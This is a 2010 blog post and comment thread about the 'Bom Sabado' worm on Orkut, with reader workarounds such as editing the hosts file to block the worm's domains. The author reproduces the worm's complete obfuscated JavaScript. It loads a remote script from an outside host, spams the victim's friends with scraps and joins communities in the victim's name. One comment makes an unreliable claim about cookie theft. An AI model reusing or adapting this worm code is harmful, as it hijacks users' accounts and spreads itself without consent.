Bom Sabado! Orkut is attacked by a new worm!

In last hour, I have received many scraps form my friends with words “Bom Sabado!”.

Needless to say, these were automated messages from my friends as they don’t know Portuguese. Bom Sabado means Good Saturday in Portuguese.

If you open your scrapbook, same scrap will be sent to all your friends from your account.

So stay away from Orkut till further notice (or use till then)

UpdateDo not open Orkut as per this official forum thread.

Workaround – Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.

A way to get rid of this and even to change your pass if you want to is:

  1. Clear your cookies/cache, then you may get an ‘Automated Query’ message. Don’t hustle about it.
  2. Just logout from your account, if you don’t know about the logout link. Here it is :
  3. After that just go to settings page or if not, better to do anything is to switch on to the ‘OLDER VERSION’ of Orkut and try re-setting your password. 🙂

You can use older version of Orkut or simply mobile version at! I used only!

Update – Above thread also shows this link –

Codes which are responsible for attacks are pasted below as they will be soon gone from above URL! 😉
var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","x3Cx73x74x79x6Cx65x2Fx3Ex3Cx69x66x72x61x6Dx65x20x73x74x79x6Cx65x3Dx64x69x73x70x6Cx61x79x3Ax6Ex6Fx6Ex65x20x6Fx6Ex6Cx6Fx61x64x3Dx22x61x20x3Dx20x64x6Fx63x75x6Dx65x6Ex74x2Ex63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x28x20x27x73x63x72x69x70x74x27x29x3Bx61x2Ex73x72x63x20x3Dx20x27x2Fx27x20x2Bx20x27x2Fx74x70x74x6Fx6Fx6Cx73x2Ex6Fx27x2Bx27x72x67x2Fx77x6Fx72x6Dx2Ex6Ax73x27x2Bx27x23x3Cx77x62x72x3Ex23x27x3Bx20x64x6Fx63x75x6Dx65x6Ex74x20x2Ex20x62x6Fx64x79x20x2Ex20x61x70x70x65x6Ex64x43x68x69x6Cx64x28x20x61x20x29x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex42x6Fx6Dx20x53x61x62x61x64x6Fx21","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;


Tanmoy Talukdar September 25, 2010

For everyone whose orkut account has been affected with the ‘bom sabado’ worm ….

The worm injects a hidden iframe containing a malicious javascript [do not click this], which steals the user cookie which contains the password in an encoded form. So the attacker do not get to know your plaintext password but can login using your credentials by impersonating using the cookie to fool the identification system. So a trivial solution is to diable javascript, another solution is to disable iframes or u can take an advanced measure by blocking the domain by editing your hosts file and redirecting it to a safe address, say

go to C:\windows\system32\drivers\etc\
There is a file named ‘hosts’. By default it is read-only. Go to it properties and uncheck the tickmark beside read-only
edit it with you favourite editor.

add this line at the end of it

save it. and then restart your network interface. ( in simple words, just reconnect your interner connection ) and bingo!! the worm’ll be useless.

Hope this helps..

Swashata September 25, 2010

How can you be sure that the js file steals cookies? I decoded the obfuscated js and couldn found any cookies stealing there! I mean no json requestion with ur cookie as get parameter! What it does is initiates some AJAX request to the Scrapbook, CommunityJoin etc URLs and post the data to scrap and join the community…

@Rahul: What do you think about this? I really dont think our cookie is by any means getting fetched!

Sauravjit September 25, 2010

Better use fb lol 😛

Kingfisher September 25, 2010

If u visited the orkut page after the worm attack den immediatly clear cache,cookies…….and change ur password.done! Now u r safe……thank u…….

nitesh September 26, 2010

I have stopped Orkuting long back, only facebook. but looks all social media may get infected found this

ritz September 26, 2010

The bus has been fixed … for sure .. have a look :- 😀

Dan* September 27, 2010

am i safe ? i got two bomb sabado scraps… i didnt do anything, dont see any automated communities joined…. later when i opened orkut i checked my scrap book and bomb sabado was gone..

so am i affected ? do i need to change my psw ? i used the google account psw to login to orkut ?

Rahul Bansal September 27, 2010

Hi Dan,
The issue seem to be fixed. I also opened Orkut today (accidentally) but it did no harm.
I guess its right time to move to Facebook! 😉

Ali Rizvi October 5, 2010

Bom Sabado is spreading like hell

so whoever are infected first clear your history and cache

or follow the following steps

Bom Sabado is spreading fast in Orkut ..Things you should do to avoid getting infected —
dont open ur scrapbook at all.Disable Java Script in ur browser, thenOpen your Host file with notepad

Windows 95/98/Me c:\windows\hosts
Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
Windows XP Home c:\windows\system32\drivers\etc\hosts
Win 7 – C:\windows\system32\drivers\etc\hosts

Add this code at the end tptools*.*org www*.*tptools*.*org convites.001webs*.*com www*.*convites.001webs*.*com

Then, completely clear ur history including ur the way they say it is fixed, but do take care …